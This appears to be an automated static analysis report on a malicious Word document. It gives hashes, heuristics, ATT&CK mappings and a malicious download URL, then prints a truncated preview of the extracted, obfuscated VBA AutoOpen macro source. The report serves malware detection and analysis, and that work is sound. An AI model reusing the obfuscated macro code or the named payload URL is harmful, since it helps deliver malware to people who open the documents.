Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d3116e7f9360433…

MALICIOUS

Office (OLE)

Size: 268.5 KB
Created: 2018-05-28 10:20:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: dd4ff12cfc5e59e754e231a35e938904
SHA-1: e0933f24844c80c719606045f93401542f865e04
SHA-256: 7d3116e7f936043344f2f001444da0fa2bb436d51a0d15e798e8359c347e5706
Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that uses CreateObject, indicating an attempt to execute arbitrary code. The macro is obfuscated, but the combination of AutoOpen and CreateObject strongly suggests it is designed to download and execute a second-stage payload from the embedded URL http://cloakingtds.xyz/text.png.

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://cloakingtds.xyz/text.png: in document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 89609 bytes
SHA-256: 29a44fe509832ed6812890e5893dca46215f6846b637aa4585c3f606c508a77f
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "S2LtTH"
Public Function GoN2cHN8Hl8Wplu(ByRef fkZsTV0EmzV4kx As String, ByRef THREE As String) As String
Dim CpbmowGaeRkkEHM() As Byte
Dim j2KH3ANjcL3rUWb As String
j2KH3ANjcL3rUWb = Application.UserName
Dim yn92iHD8HJSwgmf3M, y6SrZGWczRzJKnOkDcL As Integer
y6SrZGWczRzJKnOkDcL = Len(j2KH3ANjcL3rUWb)
Dim PNA9KVMsYeyXErHD As Collection
While y6SrZGWczRzJKnOkDcL > 5
yn92iHD8HJSwgmf3M = yn92iHD8HJSwgmf3M + 4
y6SrZGWczRzJKnOkDcL = y6SrZGWczRzJKnOkDcL - 1
Wend
Dim lMWZ1ulOXFIXles As Collection
Set lMWZ1ulOXFIXles = New Collection
lMWZ1ulOXFIXles.Add "dlha7z18Wp4LpbGWeqKKBT4locG39wI0M8O5UpaeIsfz3"
lMWZ1ulOXFIXles.Add "EPByTVOfKq5wfr88"
lMWZ1ulOXFIXles.Add "D9rNKCxQqBSyHrmxCo87xf7cEPZ24wKt4Q0C50E98DpNMViNKppTAnriBOI5m6V31"
lMWZ1ulOXFIXles.Add "01j3Lj98vxuQsqLsOG0tRjSBrsJWCrvWobrWkweuBo5sQ8ZPaOGwAxmRjiMdam6DDYlR8"
lMWZ1ulOXFIXles.Add "cmGsnojusS35zl8VyxazCjBTYr1p1WIQlGnK3H8n9zdKgrIcEDwbhCF2lwT5w42WJnTr8ybr1wzPG0wriZ"
lMWZ1ulOXFIXles.Add "jrtjBujHzC0F4GB3XbeQlFkuPxwuAmWXUEzc3upNPU4y6rU9x2TH4TNeG8UL8yGKqcv0"
Dim onzEjO1rdKepExe As String
onzEjO1rdKepExe = Application.UserName
Dim Dmt33qyKqDNvQgLEF, JRGZn3h4jptFUt6sKln As Integer
JRGZn3h4jptFUt6sKln = Len(onzEjO1rdKepExe)
Dim BKRje7Ayj61bfckZ As Collection
While JRGZn3h4jptFUt6sKln > 7
Dmt33qyKqDNvQgLEF = Dmt33qyKqDNvQgLEF + 6
JRGZn3h4jptFUt6sKln = JRGZn3h4jptFUt6sKln - 1
Wend
Dim SJq9GE6xTGX5pV8 As Collection
Set SJq9GE6xTGX5pV8 = New Collection
SJq9GE6xTGX5pV8.Add "beS9UqENzLtEuW8WXEv6e7ad1JLOSXbf7OgQSVvImnYEwKKZmpW1oumdEyIKf05atNHfxsE"
SJq9GE6xTGX5pV8.Add "nU0jVqr8vlnAk"
SJq9GE6xTGX5pV8.Add "mDMdNkmws7UiDpk4kViAav4sIaLtOSaJV43vglzsAiIlBHnTLrCoC1v1IdUwY2hagLNIvyX9i091mSrAz2"
SJq9GE6xTGX5pV8.Add "PvHeJCnCQATIBsFx4fiXTCGL14OxwU9gUAKuEs9sKVthh104N1GRTKN"
SJq9GE6xTGX5pV8.Add "5mOyzQ6BwzAhUvMfxN8SjoAETm5"
If Application.UserName = "KtFNLbkvncz" Then
MsgBox ("AjHWZDXq5ha")
Else
Dim xuxU5sNgC91cka As Integer
End If
Dim hHYfBYMYkfNLIzE9nv() As Byte
Dim EEm7nrziWhcF0Y As Integer
Dim huUQBYQTdmR As String
EEm7nrziWhcF0Y = 5882
Dim NOSvgXjccWm As Integer
huUQBYQTdmR = Right(CStr(EEm7nrziWhcF0Y), Chr(Tan(CDbl(1.55039099610836))))
NOSvgXjccWm = CInt(huUQBYQTdmR)
For ikSneTJEZx3 = NOSvgXjccWm To 41
EEm7nrziWhcF0Y = EEm7nrziWhcF0Y + 6
Next ikSneTJEZx3
If Chr(Tan(CDbl(1.55903216364514))) = U Then
Dim UNbWniEFo0KUkB As String
Dim i44J9fT4gMf As String
i44J9fT4gMf = dtlquUXLmMz
UNbWniEFo0KUkB = MB05tufCcDb
End If
If (StrComp(UNbWniEFo0KUkB, i44J9fT4gMf, vbTextCompare) <> 0) Then
MsgBox ("zaxDO3a0eqO0Dx")
End If
Dim xeNy7FhojmsfKn, Fdm2gw1AAwW As Integer
xeNy7FhojmsfKn = 1
Fdm2gw1AAwW = 4
#If EVhRDzcdY2J <> 0 Then
EVhRDzcdY2J = EVhRDzcdY2J + 5
Dim DRQX1Qfo0sQ As Variant
Else
Dim DRQX1Qfo0sQ As Object
#End If
If xeNy7FhojmsfKn > Fdm2gw1AAwW Then
For jQse2K5p6eab1u = Fdm2gw1AAwW To xeNy7FhojmsfKn
Fdm2gw1AAwW = Fdm2gw1AAwW / xeNy7FhojmsfKn
Next jQse2K5p6eab1u
End If
If Chr(Tan(CDbl(1.55903216364514))) = U Then
Dim NC9EbIdwCEty64 As String
Dim xeDxSveOeEr As String
xeDxSveOeEr = agV9Vv6OapP
NC9EbIdwCEty64 = codgJDViGEC
End If
If (StrComp(NC9EbIdwCEty64, xeDxSveOeEr, vbTextCompare) <> 0) Then
MsgBox ("vnLaEBioAh5X6l")
End If
Dim aq6OAsO7MHl8ue, AZ9wn13uj8T As Integer
aq6OAsO7MHl8ue = 4
AZ9wn13uj8T = 4
#If Hx1jLQqnH65 <> 0 Then
Hx1jLQqnH65 = Hx1jLQqnH65 + 1
Dim oj47qtjhGog As Variant
Else
Dim oj47qtjhGog As Object
#End If
If aq6OAsO7MHl8ue > AZ9wn13uj8T Then
For C3mR0mcluG7413 = AZ9wn13uj8T To aq6OAsO7MHl8ue
AZ9wn13uj8T = AZ9wn13uj8T / aq6OAsO7MHl8ue
Next C3mR0mcluG7413
End If
Dim tpmw873ZDKgLyx As Integer
For q9176SbjEEP = 3 To 32
tpmw873ZDKgLyx = q9176SbjEEP
Next q9176SbjEEP
If Chr(Tan(CDbl(1.55956084453693))) = Y Then
Dim W1JGVQzu0l0zoV As String
Dim kVtRJ8CbG2E As String
kVtRJ8CbG2E = guuZz645ZPT

... (truncated)